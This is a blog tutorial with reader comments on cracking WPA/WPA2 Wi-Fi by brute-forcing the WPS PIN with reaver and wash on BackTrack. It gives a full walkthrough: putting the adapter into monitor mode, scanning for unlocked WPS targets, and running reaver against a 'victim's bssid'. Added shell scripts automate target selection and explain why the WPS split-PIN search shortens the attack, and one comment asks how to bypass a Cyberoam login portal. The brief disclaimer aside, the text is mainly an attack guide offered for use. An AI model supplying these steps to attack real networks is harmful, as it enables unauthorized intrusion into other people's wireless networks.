
Friday, August 9, 2013

Hacking a WPA/WPA2 network


Caution: The contents below may be used only for educational purposes. Anyone who uses them for illegal purposes is responsible for the consequences themselves.

Lets Get Started

You don't need to be an expert or a computer engineer to recover the password of a WPA/WPA2-protected Wi-Fi network. With patience and the right hardware, anyone can. That is not a licence to be a jerk and break into other people's networks; test only networks you own or have written permission to test. If you have done some programming (C, C++, Java, etc.) you will find this a piece of cake, and if you haven't, don't worry: every step is described as briefly and completely as possible. Note, however, that this tutorial only works against networks that have WPS (Wi-Fi Protected Setup) enabled. It does not break WPA/WPA2 itself; it brute-forces the router's WPS PIN, and the router then hands over the WPA passphrase.

First Things First

In this tutorial I will be using BackTrack 5 for cracking the Wi-Fi password. It is open source and you can download your own copy from the link below.
BackTrack 5 R3 is the latest version, but I'll be using BackTrack 5. Be sure to select GNOME in the Window Manager tab and make sure you download a .iso file; we will use that file later to create a Live USB (or a Live bootable DVD). BackTrack has since been succeeded by Kali Linux, which ships the same reaver and wash tools; note that newer aircrack-ng releases name the monitor interface wlan0mon rather than the mon0 used throughout this post.
You will also need a Wi-Fi adapter whose driver supports monitor mode and packet injection. Monitor mode lets the adapter capture every 802.11 frame on a channel, not only the frames addressed to it; packet injection lets the tools transmit raw, hand-built frames so that they appear to belong to someone else's session. Reaver needs both: it listens to the access point's replies in monitor mode and injects its own WPS exchanges. You don't need to understand the details to follow along, but you do need to know whether your adapter can inject packets.
There is a list of network adapters that are compatible with BackTrack and capable of injection. You may visit the following link:

The good thing about BackTrack 5 R3 is that it comes with the tools "reaver" and "wash" pre-installed, which we will use for cracking WPA/WPA2 via WPS. So if you don't have BackTrack yet, download BackTrack 5 R3 and you will not have to install reaver yourself. If you have BackTrack 5, you will need to download and build reaver; I'll cover that later.
First, download BackTrack 5.

Backtrack Download Page

You may or may not register before downloading your copy of BackTrack. If you wish to download without registering, just hit the "Download" button and proceed. If you wish to register, enter your details and hit the "Register and Download" button.

After you hit the download button, the page above will show up. Choose the BackTrack version you wish to download. BackTrack 5 R3 is recommended, as mentioned earlier; however, I will be using BackTrack 5. There is not much difference between the two except that R3 has extra pre-installed tools (reaver, wash, etc.). Select the GNOME window manager. You may choose 32-bit or 64-bit as you like. Be sure to select the ISO image type, because we are going to boot BackTrack from a live USB/DVD. Software such as VirtualBox or VMware Workstation can run BackTrack as a virtual machine inside Windows instead, but a virtual machine only sees your built-in wireless card as a generic virtual Ethernet adapter, so monitor mode and injection are not available through it, and it often brings network driver trouble. It can still work if you have a compatible USB Wi-Fi adapter and pass it through to the virtual machine; otherwise boot from the live USB/DVD.

After you have downloaded BackTrack 5, the next step is to create a live USB or live DVD for booting it. First I'll show you how to create a live USB.

For creating a live USB you'll need the Unetbootin software; any other tool that can create a live USB will do. I'll be using Unetbootin. Click the link below to download it.

Creating a Live USB

After you download the file from the site, connect the USB thumb drive. Then double-click the file you just downloaded. In the Unetbootin window, select the BackTrack distribution as in the snapshot shown.

Then, in the version tab, select the version 5R1-GNOME.

Then click on Diskimage and browse to the BackTrack iso file you downloaded.

Select the drive letter of your thumb drive (pen drive).

Then click OK.

It will take around 10 minutes for your live USB to be ready. Be patient, it might take a while.

Creating a Live DVD

For creating a live DVD you will need ISO burning software. I will use PowerISO; you may use any other. If you do not have it, just google it and download it.
All you need to do is burn the ISO file onto a blank DVD. The ISO is bootable by itself, so there is nothing else to configure. Insert a blank DVD into your DVD drive, then open PowerISO. The snapshot of the PowerISO window is shown below:

Click on the Open tab, browse to your BackTrack iso file and open it.


After you've opened the iso file in PowerISO, just click on Burn.

This will take around 10 to 15 minutes depending on your DVD drive. After the burn finishes, your live DVD is ready and you're all set.

Download Reaver

This is only for those of you who will be using BackTrack 5; BackTrack 5 R3 users do not need it. There are several versions of reaver; we will be using version 1.4. Click on the link below to download reaver-1.4.

After downloading reaver-1.4 you will have a tar.gz file. Copy it to one of the local drives on your hard disk other than your Windows drive (the drive where Windows is installed), so that you can reach it from BackTrack later.

Now you're all set.

Connect your live USB or insert your live DVD, then restart your PC and boot from the live USB or DVD rather than the hard disk. For this you'll have to bring up the boot options, usually by pressing F8, F10 or F12 (or another function key) depending on your PC. In the boot menu, select USB Mass Storage if you're using the live USB, or your DVD drive if you're using the live DVD. Once you've booted correctly, a screen like the snapshot below will appear.

Press Enter. It will start loading files and a menu will be shown. Select "Default Boot Text Mode" and hit Enter.

Then wait until the welcome screen is shown. Type "startx" and hit Enter, as in the picture below.

Now your live USB/DVD has booted. Let's quickly move on and open a terminal; the location of the Terminal entry is shown in the picture below.

Once you've opened the terminal, type:      iwconfig

This command lists the wireless interfaces on your PC. In the snapshot the wireless interface is named wlan0 (it usually is, but the name depends on the adapter and driver; if yours is different, use that name throughout). iwconfig shows it as Mode:Managed, the ordinary client mode, which is not what we need.

Now type:      airmon-ng      and hit Enter.

This command lists the wireless interfaces that aircrack-ng can drive. As in the snapshot above, it shows wlan0. Now let's put the adapter into monitor mode.

Type:        airmon-ng start wlan0

This puts your adapter in monitor mode (if your interface name is not wlan0, use that name instead). On BackTrack 5, airmon-ng creates a new monitor interface named mon0 on top of wlan0; from here onwards use mon0 wherever an interface name is required. (Newer aircrack-ng releases name it wlan0mon instead.)

Now type:          airodump-ng mon0

Then press Enter.

Airodump-ng will now list every wireless network in range with its BSSID, channel, encryption type and so on. Hit Ctrl+C to stop scanning. As I stated earlier, not all of these networks can be attacked with Reaver: it requires WPS to be enabled on the access point, so we need to find out which of them are WPS enabled. For that we use the "wash" tool, which ships together with Reaver. On BackTrack 5 R3 nothing needs to be installed; on BackTrack 5 you must first build and install Reaver, which gives you wash as well.

 Installing Reaver
To install Reaver, first copy the reaver-1.4.tar.gz file into the root folder. Go to Places in the top left corner and a drop-down box will appear. Click the drive where you saved reaver-1.4.tar.gz; BackTrack mounts it and you can use the files on your hard disk.

1. Copy and paste reaver-1.4.tar.gz into the folder "root" as shown in the picture below.

2. In the Terminal, type:        cd /

3. Type:    tar zxvf    and drag reaver-1.4.tar.gz into the terminal window, as in the picture below; this appends the file's full path to the command. Hit Enter to extract it.

4. Type:    cd reaver-1.4

5. Type:     cd src

6. Type:     ./configure

7. Type:      make

8. Type:        make install

Once these eight steps are done, Reaver (and wash) are installed and ready to use.

 The Real Hacking Part

Let's find out which of the available networks are WPS enabled. As I stated earlier, we use the "wash" tool for this.

In the Terminal, type:          wash -i mon0

As you can see in the picture above, wash lists every WPS-enabled network it hears, with its BSSID, channel, signal strength (RSSI), WPS version and whether WPS is locked. Wait until your target shows up, then hit Ctrl+C to stop scanning. Note the target's BSSID and channel number, and check that its WPS Locked column says No: a locked access point will not accept PIN attempts. We'll use the BSSID and channel to aim Reaver at that access point.

           Now moving on to the final command, type:

reaver -i mon0 -b (victim's bssid) -c (channel no.) -vv

Reaver will now associate with the target access point and try WPS PINs one after another until the router accepts one and hands back the WPA passphrase. Expect roughly 4 to 10 hours. The time depends mainly on how fast the access point answers each attempt, which in turn depends on signal strength and on whether the router rate-limits or locks WPS after failed attempts. Just be patient; Reaver does the rest. Below is a snapshot of what happens after you type the final command.
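The scan-then-attack step above can be scripted so that you don't copy the BSSID and channel by hand. The shell snippet below is an added example and not part of the original post: it feeds a constructed wash scan (made-up addresses and network names, laid out in the columns wash 1.4 prints) through a small awk filter that keeps only entries whose WPS Locked column says No, because a locked access point will not answer PIN attempts, and prints the reaver command line used in this post for each remaining target. The function and variable names are mine; the interface name mon0 is the one this post uses.

```shell
#!/bin/sh
# Added example, not from the original post: turn a "wash -i mon0" scan into
# reaver command lines, skipping access points whose WPS is locked.
# SAMPLE_WASH_SCAN is CONSTRUCTED test data in the wash 1.4 column layout
# (BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID); every address and
# network name below is made up.
SAMPLE_WASH_SCAN='BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
00:11:22:33:44:55       6            -45        1.0               No                HomeNet
66:77:88:99:AA:BB      11            -70        1.0               Yes               LockedNet
CC:DD:EE:FF:00:11       1            -60        1.0               No                Cafe Guest'

# Read wash output on stdin and print "BSSID CHANNEL ESSID" for each entry
# whose WPS Locked column is "No". The first two lines (header and rule) are
# skipped; an ESSID containing spaces is glued back together.
wash_unlocked_targets() {
    awk 'NR > 2 && $5 == "No" {
        essid = $6
        for (i = 7; i <= NF; i++) essid = essid " " $i
        print $1, $2, essid
    }'
}

# The reaver invocation used in the post: interface, BSSID, channel.
reaver_cmd() {
    printf 'reaver -i %s -b %s -c %s -vv\n' "$1" "$2" "$3"
}

# One reaver command line per unlocked target in SAMPLE_WASH_SCAN,
# each preceded by a comment naming the network.
# Usage: reaver_cmds_for_scan <monitor interface>
reaver_cmds_for_scan() {
    printf '%s\n' "$SAMPLE_WASH_SCAN" | wash_unlocked_targets |
    while read -r bssid channel essid; do
        printf '# %s\n' "$essid"
        reaver_cmd "$1" "$bssid" "$channel"
    done
}

reaver_cmds_for_scan mon0
```

Against a real scan you would pipe wash into the filter (wash -i mon0 | wash_unlocked_targets) and pick one of the lines it prints; the locked entry in the sample is dropped, so only two reaver commands come out.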

It takes time, a lot of it; be patient, because in the end it is worth it. Reaver may print many warnings like "Received TimeOut", "WPS Transaction Failed", etc. Just leave it alone; it will do its job. Quite often you end up stuck in a loop retrying the same PIN. That usually means the access point has stopped answering or has locked WPS after too many failed attempts (wash shows this in its WPS Locked column). In that case stop Reaver, wait a while, move nearer to the access point and start again; Reaver resumes from the PINs it has already tried.
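Why does a brute force that would take years against an arbitrary 8-digit PIN finish in hours? The added example below (my own, not from the post or the Reaver project) works through the arithmetic in shell. The last digit of a WPS PIN is a checksum over the first seven, so only 10^7 PINs are well-formed, and the WPS registrar protocol confirms the first four digits separately, before the second half is ever examined. Reaver exploits that split: at most 10,000 guesses for the first half and 1,000 for the three free digits of the second half, 11,000 in all, which is why the running time is governed by how fast the access point answers rather than by the size of the key space. The function names are mine.

```shell
#!/bin/sh
# Added example, not from the original post or the Reaver project: the
# arithmetic behind the WPS PIN brute force. Pure shell, no radio needed.
#
# A WPS PIN is 7 free digits plus one checksum digit, and the registrar
# protocol lets an attacker confirm the first 4 digits before the last 4 are
# looked at. So the worst case is 10^4 + 10^3 guesses, not 10^7.

# Checksum digit for a 7-digit PIN body given as a string (leading zeros
# kept). This is the weighted digit sum from the WPS specification, as used
# by hostapd/wpa_supplicant: digits are weighted 3,1,3,1,... from the right.
wps_pin_checksum() {
    body=$1
    accum=0
    weight=3
    while [ -n "$body" ]; do
        digit=${body#"${body%?}"}   # last character
        body=${body%?}              # drop it
        accum=$((accum + weight * digit))
        if [ "$weight" -eq 3 ]; then weight=1; else weight=3; fi
    done
    echo $(( (10 - accum % 10) % 10 ))
}

# Full 8-digit PIN from the two halves Reaver searches separately:
# a 4-digit first half and the 3 free digits of the second half.
# Usage: wps_full_pin 1234 567   -> 12345670
wps_full_pin() {
    body=$(printf '%04d%03d' "$1" "$2")
    printf '%s%s\n' "$body" "$(wps_pin_checksum "$body")"
}

# Succeed (exit 0) only if an 8-digit PIN carries the right checksum.
wps_pin_is_valid() {
    body=${1%?}
    check=${1#"${1%?}"}
    [ "$(wps_pin_checksum "$body")" = "$check" ]
}

# Worst-case attempt counts: Reaver's split search vs. a naive search over
# every well-formed PIN.
wps_split_search_max() { echo $((10000 + 1000)); }
wps_naive_search_max() { echo $((10000000)); }

# Demo: the frequently cited example PIN 12345670 is checksum-correct.
wps_full_pin 1234 567
wps_pin_is_valid 12345670 && echo "12345670 has a valid checksum"
echo "worst case: $(wps_split_search_max) guesses instead of $(wps_naive_search_max)"
```

The checksum function works on the PIN as a string rather than a number so that PINs with leading zeros (00000000 is perfectly well-formed) are handled without the shell reading them as octal.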

After a lot of waiting

This is how it looks once Reaver has recovered the WPS PIN and the WPA passphrase. Good luck!

For WPA/WPA2 networks that have WPS disabled, see my post on hacking WPA/WPA2.
For a WEP-encrypted network, see my post on hacking WEP.

If you run into any sort of problem, comment below and I'll try my best to help. Thanks!


  1. Thanks for this blog.
    I have tried this process and it's great.
    Hacking is surely in our genes.....

  2. I am gonna surely try this!!!!!
    and I did it for WEP ... Thank you!!

  3. Does it require password list ?

    Can it be done on kali also ?

    Can you make a tutorial for FERN-WIFI CRACKER ?

    1. Fern-WIFI-Cracker looks like a great program. I am installing it now on my Gentoo Notebook. The only part I didn't like about getting into wifi was all the typing that I had to do on the bash shell. Looks pretty easy to use.

    2. No, it does require a password list. Reaver uses a brute-force attack: it tries one PIN after another, cracks the PIN of the WPS-enabled router and then recovers the password. Yes, it can be done on Kali Linux; Reaver and Wash come all set up on Kali Linux 1.3, and all the commands are the same there too. Fern-Wifi-Cracker is a great program and quite easy to use. WEP can be easily hacked with Fern-Wifi-Cracker, but hacking WPA with it requires a dictionary, and it's not sure that WPA will be hacked with it. I may be making a tutorial on that soon.

    3. Thanks and need a suggestion how to bypass cyberoam login forum so that without id surf ?